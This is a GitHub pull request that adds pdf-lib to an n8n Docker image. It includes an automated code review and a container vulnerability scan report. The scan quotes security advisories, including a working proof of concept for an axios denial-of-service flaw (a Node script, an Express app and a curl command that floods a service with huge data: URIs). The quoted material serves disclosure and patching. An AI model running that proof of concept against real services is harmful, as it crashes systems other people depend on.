
Conversation

@anatolyshipitz anatolyshipitz commented Oct 27, 2025

Summary

Adds the pdf-lib package to the n8n Docker container to enable PDF manipulation in workflows.

Changes

  • Added pdf-lib@1.17.1 installation to Dockerfile.n8n
  • Added pdf-lib to NODE_FUNCTION_ALLOW_EXTERNAL allowlist for use in Code/Function nodes
  • Introduced PDF_LIB_VERSION build argument for version management

Technical Details

  • Package: pdf-lib@1.17.1
  • Installation: global npm install with the --legacy-peer-deps and --unsafe-perm flags
  • Availability: can be used in n8n Code and Function nodes via require('pdf-lib'); see the sketch below
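
A minimal sketch of what this enables inside a Code node, assuming an image built from this PR (require('pdf-lib') resolves only because of the allowlist change):

// Inside an n8n Code node ("Run Once for All Items").
// Generates a one-page PDF and returns it as base64 for downstream nodes.
const { PDFDocument, StandardFonts } = require('pdf-lib');

const pdfDoc = await PDFDocument.create();
const page = pdfDoc.addPage([595, 842]); // A4 page size in PDF points
const font = await pdfDoc.embedFont(StandardFonts.Helvetica);
page.drawText('Generated from an n8n workflow', { x: 50, y: 780, size: 14, font });

const pdfBytes = await pdfDoc.save(); // Uint8Array
return [{ json: { pdfBase64: Buffer.from(pdfBytes).toString('base64') } }];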

Benefits

  • Enables PDF creation, modification, and manipulation directly in n8n workflows
  • Allows programmatic PDF operations without external services
  • Maintains consistent package versioning through build arguments

Summary by CodeRabbit

  • New Features
    • Added PDF library support, enabling users to work with PDF files and perform document operations as part of their workflow automations.

@anatolyshipitz anatolyshipitz self-assigned this Oct 27, 2025

coderabbitai bot commented Oct 27, 2025

Walkthrough

Modified Dockerfile.n8n to add support for pdf-lib by introducing a build argument PDF_LIB_VERSION, installing pdf-lib globally via npm, and extending the NODE_FUNCTION_ALLOW_EXTERNAL environment variable to include pdf-lib.

Changes

Docker configuration for pdf-lib support (Dockerfile.n8n): Added the ARG PDF_LIB_VERSION build argument; updated the npm install step to include pdf-lib@${PDF_LIB_VERSION}; extended ENV NODE_FUNCTION_ALLOW_EXTERNAL to include pdf-lib alongside the existing entries.

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

  • Straightforward configuration changes with no complex logic or branching conditions

Possibly related PRs

Suggested reviewers

  • killev

Poem

🐰 A PDF lib hops into the scene,
In Docker's domain, so clean and serene,
With args and allows, we weave the thread,
Global npm packages, perfectly spread! 📄✨

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
Docstring Coverage: ⚠️ Warning. Docstring coverage is 0.00%, below the required threshold of 80.00%. Resolution: run @coderabbitai generate docstrings to improve coverage.
✅ Passed checks (2 passed)
Description Check: ✅ Passed. Check skipped because CodeRabbit's high-level summary is enabled.
Title Check: ✅ Passed. The PR title "Add pdf-lib Support to n8n Container" accurately reflects the changeset: a build argument for pdf-lib versioning, installation of pdf-lib in the container, and its addition to the NODE_FUNCTION_ALLOW_EXTERNAL allowlist for Code/Function nodes. The title is specific and descriptive; a developer scanning the commit history would immediately understand its purpose.

@coderabbitai coderabbitai bot left a comment

Actionable comments posted: 0

🧹 Nitpick comments (2)
Dockerfile.n8n (2)

14-19: Document npm install flags and verify package installation compatibility.

The npm install uses several flags (--legacy-peer-deps, --unsafe-perm, --ignore-scripts) that warrant documentation. Ensure that pdf-lib installs cleanly with these flags and that --legacy-peer-deps doesn't mask actual peer dependency conflicts that could cause runtime issues.

Consider adding an inline comment explaining the purpose of these flags, especially --unsafe-perm, which permits elevated permissions during npm installation.

Apply this diff to add clarifying comments:

 # Install git for backup script and other packages + install external packages in one layer
 USER root
 RUN set -eux; \
   apk add --no-cache git=2.49.1-r0 && \
+  # Install external npm packages globally for use in Code/Function nodes
+  # --legacy-peer-deps: allows compatible peer dependency versions
+  # --unsafe-perm: permits npm install to run as root in container context
   npm install -g --no-audit --no-fund --ignore-scripts \
     --legacy-peer-deps --no-workspaces \
     --unsafe-perm \

23-23: Add inline documentation for NODE_FUNCTION_ALLOW_EXTERNAL.

The environment variable correctly lists all globally installed packages, enabling their use within n8n Code/Function nodes. Consider adding a comment to explain its purpose for future maintainers; a usage sketch follows the diff below.

Apply this diff to add documentation:

 # Configure external modules allowlist used by Code/Function nodes
+# Comma-separated list of npm packages available via require() in Code nodes
 ENV NODE_FUNCTION_ALLOW_EXTERNAL="showdown,slackify-markdown,pdf-lib"
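
For context, a hedged sketch (not part of this diff) of what the allowlist permits inside a Code node; each listed package becomes require()-able:

// Inside an n8n Code node; require() is only permitted for packages named
// in NODE_FUNCTION_ALLOW_EXTERNAL (here: showdown, slackify-markdown, pdf-lib).
const slackify = require('slackify-markdown');
return [{ json: { slackText: slackify('# Release notes\n*pdf-lib* is now available.') } }];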
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 0dc0722 and f83377b.

📒 Files selected for processing (1)
  • Dockerfile.n8n (2 hunks)
🧰 Additional context used
📓 Path-based instructions (2)
Dockerfile.{n8n,temporal}

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

Custom Docker images must be defined using Dockerfile.n8n and Dockerfile.temporal, each extending their respective official base images with custom configurations

Files:

  • Dockerfile.n8n
Dockerfile.n8n

📄 CodeRabbit inference engine (.cursor/rules/project-structure.mdc)

Use Dockerfile.n8n for custom n8n image configuration.

Files:

  • Dockerfile.n8n
🧠 Learnings (1)
📓 Common learnings
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to Dockerfile.n8n : Use Dockerfile.n8n for custom n8n image configuration.
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
Dockerfile.n8n (1)

8-8: No issues found with pdf-lib@1.17.1.

The version 1.17.1 is the latest published version on npm and has no known security vulnerabilities reported in public trackers or the project advisories. The exact version pin (rather than a range) is appropriate for stability and reproducibility in this context.


github-actions bot commented Oct 27, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference: n8n-test:latest
digest: sha256:be96ff1a608da9eab5e91d533e5e2a5bb7362ddfb37cc309963c76bcb8861b20
vulnerabilities: critical: 2, high: 14, medium: 0, low: 0
platform: linux/amd64
size: 342 MB
packages: 1848
📦 Base Image: node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digest: sha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilities: critical: 0, high: 1, medium: 2, low: 2
libxml2 2.13.8-r0 (apk) | critical: 2, high: 2, medium: 0, low: 0

pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22

critical: CVE-2025-49796
Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.438% (62nd percentile)
Description

critical: CVE-2025-49794
Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.251% (48th percentile)
Description

high: CVE-2025-6021
Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.546% (67th percentile)
Description

high: CVE-2025-49795
Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.141% (35th percentile)
Description
xlsx 0.20.2 (npm) | critical: 0, high: 2, medium: 0, low: 0

pkg:npm/xlsx@0.20.2

high 7.8: CVE-2023-30533 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
Affected range: >=0
Fixed version: Not Fixed
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 4.328% (88th percentile)
Description

All versions of SheetJS CE through 0.19.2 are vulnerable to "Prototype Pollution" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.

high 7.5: CVE-2024-22363 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
Affected range: >=0
Fixed version: Not Fixed
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.079% (24th percentile)
Description

SheetJS Community Edition before 0.20.2 is vulnerable to Regular Expression Denial of Service (ReDoS).

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

tar-fs 2.1.3 (npm) | critical: 0, high: 1, medium: 0, low: 0

pkg:npm/tar-fs@2.1.3

high 8.7: CVE-2025-59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range: >=2.0.0, <2.1.4
Fixed version: 2.1.4
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.024% (5th percentile)
Description

Impact

Affects v3.1.0, v2.1.3, v1.16.5 and below.

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to skip entries that are not plain files or directories; a fuller extraction sketch follows the snippet below.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }
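
Applied to an extraction, the workaround might look like the following sketch (archive.tar and ./out are illustrative names):

const tar = require('tar-fs');
const fs = require('fs');

fs.createReadStream('archive.tar').pipe(
  tar.extract('./out', {
    // Returning true skips the entry: anything that is not a plain file or
    // directory (e.g. a symlink) is ignored, closing the traversal vector.
    ignore(_, header) {
      return header.type !== 'file' && header.type !== 'directory';
    },
  })
);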

Credit

Reported by: Mapta / BugBunny_ai

openssh 10.0_p1-r7 (apk) | critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high: CVE-2023-51767
Affected range: <=10.0_p1-r7
Fixed version: Not Fixed
EPSS Score: 0.008% (1st percentile)
Description
n8n 1.109.2 (npm) | critical: 0, high: 1, medium: 0, low: 0

pkg:npm/n8n@1.109.2

high 8.8: GHSA-365g-vjw2-grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected range: <=1.114.4
Fixed version: Not Fixed
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE='["n8n-nodes-base.executeCommand"]'

References

n8n docs: Execute Command
n8n docs: Blocking nodes

curl 8.14.1-r1 (apk) | critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22

high: CVE-2025-9086
Affected range: <8.14.1-r2
Fixed version: 8.14.1-r2
EPSS Score: 0.077% (24th percentile)
Description
axios 1.11.0 (npm) | critical: 0, high: 1, medium: 0, low: 0

pkg:npm/axios@1.11.0

high 7.5: CVE-2025-58754 Allocation of Resources Without Limits or Throttling
Affected range: >=1.0.0, <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.025% (5th percentile)
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects once totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, for which axios ignores maxContentLength and maxBodyLength entirely and decodes the payload into memory on Node before streaming, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send three POST requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit (see the sketch after this list).

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
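
A minimal sketch of suggestion (1): estimate the decoded size and reject before allocating (safeFromDataURI and maxBytes are illustrative names, not axios API):

// Reject oversized data: URIs before decoding the payload into memory.
function safeFromDataURI(uri, maxBytes) {
  const comma = uri.indexOf(',');
  if (comma === -1) throw new Error('Malformed data: URI');
  const meta = uri.slice(0, comma);
  const body = uri.slice(comma + 1);
  const isBase64 = /;base64$/i.test(meta);
  // Base64 decodes to roughly 3/4 of the encoded length; estimate first.
  const estimated = isBase64 ? Math.floor((body.length * 3) / 4) : body.length;
  if (maxBytes != null && estimated > maxBytes) {
    throw new Error(`data: payload (~${estimated} bytes) exceeds ${maxBytes}-byte limit`);
  }
  return Buffer.from(isBase64 ? body : decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
}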

playwright 1.54.2 (npm) | critical: 0, high: 1, medium: 0, low: 0

pkg:npm/playwright@1.54.2

high 8.7: CVE-2025-59288 Improper Verification of Cryptographic Signature
Affected range: <1.55.1
Fixed version: 1.55.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score: 0.027% (6th percentile)
Description

Summary

Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications.

Details

The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate:

In each case, the shell scripts download a browser installer package using curl -k and immediately install it:

curl --retry 3 -o ./<pkg-file> -k <url>
sudo installer -pkg /tmp/<pkg-file> -target /

Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content.
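
For contrast, a hedged sketch (not Playwright's actual fix) of a download path that keeps TLS verification on and gates installation on a known checksum, in Node:

const { createHash } = require('node:crypto');
const fs = require('node:fs');

async function downloadVerified(url, dest, expectedSha256) {
  const res = await fetch(url); // certificate verification stays enabled
  if (!res.ok) throw new Error(`Download failed: HTTP ${res.status}`);
  const buf = Buffer.from(await res.arrayBuffer());
  const digest = createHash('sha256').update(buf).digest('hex');
  if (digest !== expectedSha256) throw new Error('Checksum mismatch; refusing to install');
  fs.writeFileSync(dest, buf);
}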

PoC

A high-level exploitation scenario:

  1. An attacker performs a MitM attack on a network where the victim runs one of these scripts.
  2. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer).
  3. Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation.
  4. The attacker's code is executed with system privileges, leading to full compromise.

No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough.

Impact

This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments.

Fix

Credit

  • This vulnerability was uncovered by tooling by Socket
  • This vulnerability was confirmed by @evilpacket
  • This vulnerability was reported by @JLLeitschuh at Socket

Disclosure

openssl 3.5.2-r0 (apk) | critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22

high: CVE-2025-9230
Affected range: <3.5.4-r0
Fixed version: 3.5.4-r0
EPSS Score: 0.026% (6th percentile)
Description
expat 2.7.1-r0 (apk) | critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22

high: CVE-2025-59375
Affected range: <2.7.2-r0
Fixed version: 2.7.2-r0
EPSS Score: 0.102% (29th percentile)
Description
n8n-nodes-base 1.107.0 (npm) | critical: 0, high: 1, medium: 0, low: 0

pkg:npm/n8n-nodes-base@1.107.0

high 8.8: GHSA-365g-vjw2-grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected range: <=1.113.0
Fixed version: Not Fixed
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Identical to the GHSA-365g-vjw2-grx8 write-up for n8n 1.109.2 above.

axios 1.8.3 (npm) | critical: 0, high: 1, medium: 0, low: 0

pkg:npm/axios@1.8.3

high 7.5: CVE-2025-58754 Allocation of Resources Without Limits or Throttling
Affected range: >=1.0.0, <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.025% (5th percentile)
Description

Identical to the CVE-2025-58754 write-up for axios 1.11.0 above.

@anatolyshipitz anatolyshipitz enabled auto-merge (squash) October 28, 2025 12:51
sonarqubecloud bot commented Dec 3, 2025

1 similar comment
